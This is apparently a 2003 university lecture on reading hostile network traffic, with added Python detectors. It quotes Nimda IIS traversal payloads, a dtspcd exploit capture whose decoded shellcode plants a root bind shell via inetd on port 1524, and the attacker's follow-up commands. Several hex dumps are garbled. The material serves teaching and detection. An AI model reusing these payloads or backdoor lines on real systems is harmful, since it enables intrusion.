Lecture 25: Network Primer 7/17/2003 CSCE 590 Summer 2003.

WinNuke
nuker.com > victim.edu.139: FP 0:3(3) ack 1 win 8760 urg 3 (DF)

And This?
3:46: dos.com > : (frag
3:46: dos.com > : (frag
3:46: dos.com > : (frag
3:46: dos.com > : (frag
3:46: dos.com > : (frag
3:46: dos.com > : (frag
3:46: dos.com > : (frag
3:46: dos.com > : (frag
3:46: dos.com > : (frag
3:46: dos.com > : (frag

Bad Network Traffic in Other Places
Web logs
Traffic monitoring graphs
Firewall logs
Intrusion detection systems
Router syslogs
I even see attempts against my SSH tunnels!

Slammer
02:06: > ms-sql-m: udp
:06: > : icmp: udp port ms-sql-m unreachable [tos 0xc0]

Nimda
[12/Apr/2002:12:01: ] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
[12/Apr/2002:12:01: ] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
[12/Apr/2002:12:01: ] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
[12/Apr/2002:12:01: ] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
[12/Apr/2002:12:01: ] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
[12/Apr/2002:12:01: ] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
[12/Apr/2002:12:01: ] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
[12/Apr/2002:12:01: ] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
[12/Apr/2002:12:01: ] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
[12/Apr/2002:12:01: ] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 -
[12/Apr/2002:12:01: ] "GET /scripts/..%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
[12/Apr/2002:12:01: ] "GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
[12/Apr/2002:12:01: ] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
[12/Apr/2002:12:01: ] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 -
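Added here as an example that is not part of the lecture: a small Python web-log scanner for the Nimda probe pattern shown above. It double-decodes each request path (the %255c trick), matches the overlong UTF-8 forms that IIS decoded but Python will not, and groups hits per client so that a burst of encodings from one source stands out. The log lines, client addresses and status codes are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed log lines in the shape shown on the slide; the client addresses,
# seconds and status codes are placeholders, not values from a real server.
SAMPLE_LOG = """\
192.0.2.10 - - [12/Apr/2002:12:01:05 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
192.0.2.10 - - [12/Apr/2002:12:01:05 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 -
192.0.2.10 - - [12/Apr/2002:12:01:06 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 -
198.51.100.7 - - [12/Apr/2002:12:01:07 -0500] "GET /index.html HTTP/1.0" 200 1043
198.51.100.7 - - [12/Apr/2002:12:01:08 -0500] "GET /images/logo.gif HTTP/1.0" 200 2210
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# Overlong UTF-8 forms (%c0%af, %c1%9c, ...) that IIS decoded to '/' or '\';
# Python's decoder rejects them, so they are matched on the raw URL instead.
OVERLONG_RE = re.compile(r'\.\.%c[01]%[0-9a-f]{2}')

def probe_indicators(path):
    """Return the reasons a request path looks like a Nimda-style probe."""
    raw = path.lower()
    decoded = unquote(unquote(raw))   # undo double encoding: %255c -> %5c -> '\'
    indicators = []
    if 'cmd.exe' in decoded:
        indicators.append('command shell')
    if '../' in decoded or '..\\' in decoded or OVERLONG_RE.search(raw):
        indicators.append('directory traversal')
    return indicators

def scan_log(text):
    """Return (client, path, status, indicators) for every suspicious request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _ts, _method, path, status = m.groups()
        found = probe_indicators(path)
        if found:
            hits.append((client, path, int(status), found))
    return hits

def noisy_clients(text, threshold=2):
    """Clients that sent at least `threshold` distinct probe paths: a worm fires
    a burst of encodings within a second, a single mistyped URL does not."""
    paths = {}
    for client, path, _, _ in scan_log(text):
        paths.setdefault(client, set()).add(path)
    return sorted(c for c, p in paths.items() if len(p) >= threshold)
```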

Firewall Logs

Intrusion Detection Systems
Lets us detect signatures inside packets
It would be very hard to write a tcpdump filter for Nimda
More versatile than tcpdump
Tcpdump is more universal and quicker
Tcpdump allows you to record all traffic; an IDS usually only records matches on signatures

Solaris dtspcd Attack
Honeynet.org Scan of the Month, Scan 20
Let's just scan through the network capture with tcpdump and see what we see
Then we'll look at it with Ethereal

10:45: IP > : P 1:34(33) ack 1 win (DF)
0x a c6 d03d 01a0
0x0010 ac e06 17e0 fe2a 6e27 5f37 bfc2 ...f.....*n'_7..
0x ebc 845d a 1ba7 dbc0 ..>..]
x f 710d ?q
x f6f d root.
0x
:45: IP > : . ack 34 win <nop,nop,timestamp > (DF)
0x a f06 51ec ac
x0010 d03d 01a0 17e0 0e06 5f37 bfc2 fe2a 6e48 .=......_7...*nH
0x d a 003f `(} ?q.
0x0030 1ba7 dbc
:45: IP > : P 1:68(67) ack 34 win (DF)
0x a f06 51a8 ac
x0010 d03d 01a0 17e0 0e06 5f37 bfc2 fe2a 6e48 .=......_7...*nH
0x cc a 003f `(V ?q#
0x0030 1ba7 dbc
x f 2f2e f //.SP
0x f f C_AAAH_aqWg
x a 7a79 3a53 756e 4f53 3a35 2e38 .buzzy:SunOS:5.8
0x0070 3a73 756e :sun4u.

What did we see?
Src address:
Dst address:
Target port: 6112
–Solaris Common Desktop Environment
–Dtspcd: CDE Subprocess Control Service
–network daemon that accepts requests from clients to execute commands and launch applications remotely
–Runs as root
–Usually spawned by inetd or xinetd in response to CDE client request

What else?
In the first packet from attacker to victim, we see the word "root". Hmmmm
Then the victim starts answering back
In the third packet it announces what operating system it is running and its architecture
Going on…

10:46: IP > : P 1:1449(1448) ack 1 win (DF)
0x dc a1ac c d03d 01a0
0x0010 ac e08 17e0 fee2 c115 5f66 192f ...f _f./
0x ebc e1e a 1ba7 dffb ..>
x f ?uH
x e
x c c c
0x c c c c
0x c c c c
0x c c c c
0x c c c c
Etc …. Etc …. Cut here….
0x04d0 801c c c c
0x04e0 801c c c c
0x04f0 20bf ffff 20bf ffff 7fff ffff 9003 e
x e020 a c a c02a 2008 .# *..
0x0510 c02a 200e d023 ffe0 e223 ffe4 e423 ffe8 .*...#...#...#..
0x0520 c023 ffec b 91d f62 696e .# /bin
0x0530 2f6b d f /ksh....-c..echo
0x e c6f 636b "ingreslock.str
0x d e6f eam.tcp.nowait.r
0x0560 6f6f f62 696e 2f d oot./bin/sh.sh.-
0x e2f 746d 702f 783b 2f f73 i">/tmp/x;/usr/s
0x e2f 696e d73 202f 746d bin/inetd.-s./tm
0x f 783b 736c b2f 6269 p/x;sleep.10;/bi
0x05a0 6e2f 726d 202d f74 6d70 2f n/rm.-f./tmp/x.A
0x05b AAAAAAAAAAAAAAAA
0x05c AAAAAAAAAAAAAAAA
0x05d AAAAAAAAAAAA

Now what did we see?
Lots of "801C 4011"; 67 lines of them were cut out
We have here a Sparc NOP slide
–An Intel x86 slide would have "90 90"s
–Common technique in buffer-overflow attacks
–Try to get the exploited program to execute shell code as the program owner
–Increases the odds the buffer overflow will execute the exploit code without having to figure out exact locations
–If the buffer overflow pointer lands in them, the exploit code will eventually be run
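Added here as an example that is not from the lecture: a Python scanner that rebuilds packet bytes from a tcpdump -X style hex dump and measures the longest run of the SPARC "801c 4011" filler or of x86 0x90 bytes, which turns the "lots of 801C 4011" observation into a repeatable check a defender can run over captures. The dump below is constructed for the example, not the slide's capture.

```python
import re

# Constructed tcpdump -X style dump (offset, eight 16-bit words, ASCII gutter), not the
# capture from the slides: a header-like first line, ten copies of the 4-byte filler the
# slide identifies as the SPARC NOP, the start of "/bin/ksh", then some x86 0x90 bytes.
SAMPLE_DUMP = """\
0x0000 4500 05dc a1ac 4000 3c06 0000 0a00 0001  E.....@.<.......
0x0010 801c 4011 801c 4011 801c 4011 801c 4011  ..@...@...@...@.
0x0020 801c 4011 801c 4011 801c 4011 801c 4011  ..@...@...@...@.
0x0030 801c 4011 801c 4011 2f62 696e 2f6b 7368  ..@...@./bin/ksh
0x0040 2000 0000 9090 9090 9090 9090 9090 9090  ................
"""

NOP_PATTERNS = {
    "sparc": bytes.fromhex("801c4011"),  # 4-byte filler named on the slide
    "x86": bytes.fromhex("90"),          # 1-byte nop
}
# Offset (with or without a trailing colon), then up to eight 4-hex-digit words.
HEX_LINE_RE = re.compile(r"^\s*0x[0-9a-fA-F]+:?\s+((?:[0-9a-fA-F]{4}\s+){1,8})")

def dump_to_bytes(text):
    """Rebuild packet bytes from a hex dump, ignoring offsets and the ASCII gutter."""
    out = bytearray()
    for line in text.splitlines():
        m = HEX_LINE_RE.match(line)
        if m:
            out += bytes.fromhex("".join(m.group(1).split()))
    return bytes(out)

def longest_nop_run(data, arch):
    """(length in bytes, start offset) of the longest contiguous run of arch's NOP."""
    nop, best, i = NOP_PATTERNS[arch], (0, -1), 0
    while i < len(data):
        if not data.startswith(nop, i):
            i += 1
            continue
        start = i
        while data.startswith(nop, i):
            i += len(nop)
        if i - start > best[0]:
            best = (i - start, start)
    return best

def sled_verdict(data, min_bytes=32):
    """Per architecture, runs long enough to be a sled rather than incidental padding."""
    verdict = {}
    for arch in NOP_PATTERNS:
        length, start = longest_nop_run(data, arch)
        if length >= min_bytes:
            verdict[arch] = (length, start)
    return verdict
```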

What code will be run?
If we read the shell code, we'd see that the following will be exec'ed:
1. /bin/ksh -c echo "ingreslock stream tcp nowait root /bin/sh sh -i">/tmp/x;
2. /usr/sbin/inetd -s /tmp/x;
3. sleep 10;
4. /bin/rm -f /tmp/x
Line 1 uses a ksh to execute an echo command. The echo writes a pre-formatted inetd line to a temp file, /tmp/x
Line 2: runs inetd, using /tmp/x as its configuration
Line 3: sleeps 10 seconds to make sure inetd is started
Line 4: cleans up the evidence

The inetd Line
What does the inetd line do?
ingreslock stream tcp nowait root /bin/sh sh -i
Ingreslock is TCP port 1524
This line opens up an interactive root shell when someone connects to TCP port 1524
Guess what happens a little later?
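Added here as an example that is not from the lecture: a Python audit that splits an inetd.conf entry into its seven positional fields (service, socket type, protocol, wait/nowait, user, server program, arguments) and reports why an entry like the one above is a bind-shell backdoor. The service-to-port table is constructed for the example; ingreslock/1524 is the value the slide gives.

```python
import shlex

# Constructed service table: ingreslock/1524 is stated on the slide, the other two
# are the standard /etc/services assignments.
SERVICES = {"ingreslock": 1524, "telnet": 23, "ftp": 21}
SHELLS = {"sh", "ksh", "csh", "bash"}

def parse_inetd_line(line):
    """Split an inetd.conf entry into its fields; None for blank or comment lines."""
    fields = shlex.split(line, comments=True)
    if not fields:
        return None
    if len(fields) < 6:
        raise ValueError("inetd entry needs at least 6 fields: " + line)
    service, socktype, proto, wait, user, program = fields[:6]
    return {"service": service, "socket": socktype, "proto": proto, "wait": wait,
            "user": user, "program": program, "args": fields[6:],
            "port": SERVICES.get(service)}

def audit_inetd_line(line):
    """Reasons an entry looks like a bind-shell backdoor (empty list if clean)."""
    entry = parse_inetd_line(line)
    if entry is None:
        return []
    reasons = []
    if entry["program"].rsplit("/", 1)[-1] in SHELLS:
        reasons.append("server program is a shell: " + entry["program"])
        if "-i" in entry["args"]:
            reasons.append("shell is interactive on the socket")
        if entry["user"] == "root":
            reasons.append("shell runs as root")
    return reasons

def audit_inetd_conf(text):
    """Return {service: reasons} for every flagged entry in a whole config file."""
    flagged = {}
    for line in text.splitlines():
        reasons = audit_inetd_line(line)
        if reasons:
            flagged[parse_inetd_line(line)["service"]] = reasons
    return flagged
```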

10:46: IP > : P 1:209(208) ack (DF)
0x a1cc d4 d03d 01a0
0x0010 ac e0c 05f4 fff fbb f %_...
0x ebc a 1ba7 e57b ..>.P {
0x f 7ac8 756e 616d d61 3b6c 7320 .?z.uname.-a;ls.
0x0040 2d6c 202f 636f f f l./core./var/dt
0x0050 2f74 6d70 2f e 6c6f 673b /tmp/DTSPCD.log;
0x d2f f 6c6f c2f PATH=/usr/local/
0x e3a 2f f62 696e 3a2f 6269 bin:/usr/bin:/bi
0x0080 6e3a 2f f e3a 2f n:/usr/sbin:/sbi
0x0090 6e3a 2f f f62 696e 3a2f n:/usr/ccs/bin:/
0x00a f 676e 752f e3b f usr/gnu/bin;expo
0x00b b f rt.PATH;echo."BD
0x00c a d66 .PID(s):."`ps.-f
0x00d c d73 202f 746d ed|grep.'.-s./tm
0x00e0 702f c d p/x'|grep.-v.gre
0x00f0 707c b20 277b e p|awk.'{print.$2
0x0100 7d27 600a }'`.

What happened here?
Looks scripted. Why?
1. uname -a;
2. ls -l /core /var/dt/tmp/DTSPCD.log;
3. PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/usr/ccs/bin:/usr/gnu/bin;
4. export PATH;
5. echo "BD PID(s): "`ps -fed|grep ' -s /tmp/x'|grep -v grep|awk '{print $2}'`

10:46: IP > : P 3:98(95) ack 209 win (DF)
0x aa f06 516e ac
x0010 d03d 01a0 05f4 0e0c 5fbb 0119 fff7 80f5 .=......_
x a 003f 7ae3 ..`($ ?z.
0x0030 1ba7 e58d e4f a7a SunOS.buzzy.
0x e e f Generic_1085
0x d e sun4u.spar
0x e57 2c55 6c d35 5f31 c.SUNW,Ultra-5_1
0x a 2f63 6f72 653a 204e 6f /core:.No.such
0x c f f .file.or.directo
0x a ry.
10:46: IP > : P 98:148(50) ack 209 win (DF)
0x aa f06 519a ac
x0010 d03d 01a0 05f4 0e0c 5fbb 0178 fff7 80f5 .=......_..x....
0x ff a 003f 7aed ..`( ?z.
0x0030 1ba7 e598 2f f64 742f 746d 702f ..../var/dt/tmp/
0x e6c 6f67 3a20 4e6f 2073 DTSPCD.log:.No.s
0x c65 206f uch.file.or.dire
0x f72 790a ctory.
10:46: IP > : P 148:164(16) ack 209 win (DF)
0x aa f06 51bb ac
x0010 d03d 01a0 05f4 0e0c 5fbb 01aa fff7 80f5 .=......_
x c a 003f 7b00 ..`(.R ?{.
0x0030 1ba7 e5a a BD.PID(s):.3
0x a 476.

The Output from the Commands
1. # SunOS buzzy 5.8 Generic_ sun4u sparc SUNW,Ultra-5_10
2. /core: No such file or directory
3. /var/dt/tmp/DTSPCD.log: No such file or directory
4. BD PID(s): 3476

Interactive Commands
Let's go to Ethereal for this part…
